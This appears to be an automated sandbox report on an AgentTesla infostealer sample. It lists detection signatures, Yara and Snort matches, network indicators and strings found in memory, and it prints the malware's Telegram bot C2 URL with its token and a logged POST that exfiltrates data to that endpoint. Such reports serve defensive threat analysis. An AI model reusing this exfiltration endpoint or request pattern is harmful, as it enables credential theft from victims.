Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rzN2ckYW24.exe

Overview

General Information

Sample Name:rzN2ckYW24.exe
Analysis ID:736948
MD5:44159444c9bc9980871b80b3ae071ffb
SHA1:baf57ff497d2e202a1a119e8719e44c0aa100475
SHA256:9e4f0e0a10a778fb94e7631c17082b44bf75170d7ca81b393574fd3f4c004f47
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • rzN2ckYW24.exe (PID: 3044 cmdline: C:\Users\user\Desktop\rzN2ckYW24.exe MD5: 44159444C9BC9980871B80B3AE071FFB)
    • rzN2ckYW24.exe (PID: 6132 cmdline: C:\Users\user\Desktop\rzN2ckYW24.exe MD5: 44159444C9BC9980871B80B3AE071FFB)
    • rzN2ckYW24.exe (PID: 6128 cmdline: C:\Users\user\Desktop\rzN2ckYW24.exe MD5: 44159444C9BC9980871B80B3AE071FFB)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
          • 0x31d21:$a13: get_DnsResolver
          • 0x30402:$a20: get_LastAccessed
          • 0x3274f:$a27: set_InternalServerPort
          • 0x32a84:$a30: set_GuidMasterKey
          • 0x30514:$a33: get_Clipboard
          • 0x30522:$a34: get_Keyboard
          • 0x3191b:$a35: get_ShiftKeyDown
          • 0x3192c:$a36: get_AltKeyDown
          • 0x3052f:$a37: get_Password
          • 0x31062:$a38: get_PasswordHash
          • 0x32183:$a39: get_DefaultCredentials
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          0.2.rzN2ckYW24.exe.3dd31a8.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.rzN2ckYW24.exe.3dd31a8.13.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.rzN2ckYW24.exe.3dd31a8.13.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32c5f:$s10: logins
              • 0x326d9:$s11: credential
              • 0x2e914:$g1: get_Clipboard
              • 0x2e922:$g2: get_Keyboard
              • 0x2e92f:$g3: get_Password
              • 0x2fd0b:$g4: get_CtrlKeyDown
              • 0x2fd1b:$g5: get_ShiftKeyDown
              • 0x2fd2c:$g6: get_AltKeyDown
              0.2.rzN2ckYW24.exe.3dd31a8.13.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x30121:$a13: get_DnsResolver
              • 0x2e802:$a20: get_LastAccessed
              • 0x30b4f:$a27: set_InternalServerPort
              • 0x30e84:$a30: set_GuidMasterKey
              • 0x2e914:$a33: get_Clipboard
              • 0x2e922:$a34: get_Keyboard
              • 0x2fd1b:$a35: get_ShiftKeyDown
              • 0x2fd2c:$a36: get_AltKeyDown
              • 0x2e92f:$a37: get_Password
              • 0x2f462:$a38: get_PasswordHash
              • 0x30583:$a39: get_DefaultCredentials
              2.0.rzN2ckYW24.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 28 entries
                No Sigma rule has matched
                Timestamp:192.168.2.3149.154.167.220497034432851779 11/03/22-12:21:37.839026
                SID:2851779
                Source Port:49703
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: rzN2ckYW24.exeVirustotal: Detection: 30%Perma Link
                Source: rzN2ckYW24.exeReversingLabs: Detection: 31%
                Source: rzN2ckYW24.exeJoe Sandbox ML: detected
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: rzN2ckYW24.exe.6132.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/"}
                Source: rzN2ckYW24.exe.6128.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendMessage"}
                Source: rzN2ckYW24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49703 version: TLS 1.2
                Source: rzN2ckYW24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeDNS query: name: api.ipify.org
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dabd95f4b3e0e1Host: api.telegram.orgContent-Length: 1063Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 3.220.57.224 3.220.57.224
                Source: Joe Sandbox ViewIP Address: 3.220.57.224 3.220.57.224
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: rzN2ckYW24.exe, 00000002.00000003.326404699.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000002.521468359.0000000000C26000.00000004.00000020.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000003.361780005.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: rzN2ckYW24.exe, 00000000.00000003.257245989.0000000005C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
                Source: rzN2ckYW24.exe, 00000000.00000003.256683274.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.256591750.0000000005CA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wikipedia
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: rzN2ckYW24.exe, 00000002.00000002.525344688.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wmwpuO0P35oL9Q.com
                Source: rzN2ckYW24.exe, 00000000.00000003.260307774.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260356342.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersS
                Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.264972803.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
                Source: rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
                Source: rzN2ckYW24.exe, 00000000.00000003.266665020.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                Source: rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomF
                Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomp
                Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
                Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comitum
                Source: rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                Source: rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commTTF
                Source: rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comp
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cB
                Source: rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259464865.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259543069.0000000005C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cns-ea
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmp
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//ra
                Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                Source: rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-d
                Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
                Source: rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/dz
                Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: rzN2ckYW24.exe, 00000000.00000003.261392765.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: rzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coma
                Source: rzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comiv
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: rzN2ckYW24.exe, 00000000.00000003.262413128.0000000005CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comrm
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgappdatajVuurjVuur.exe/http://TMVuQQ.com
                Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/5596534279%discordapi%yyy
                Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument
                Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4Tkh
                Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownHTTP traffic detected: POST /bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dabd95f4b3e0e1Host: api.telegram.orgContent-Length: 1063Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49703 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
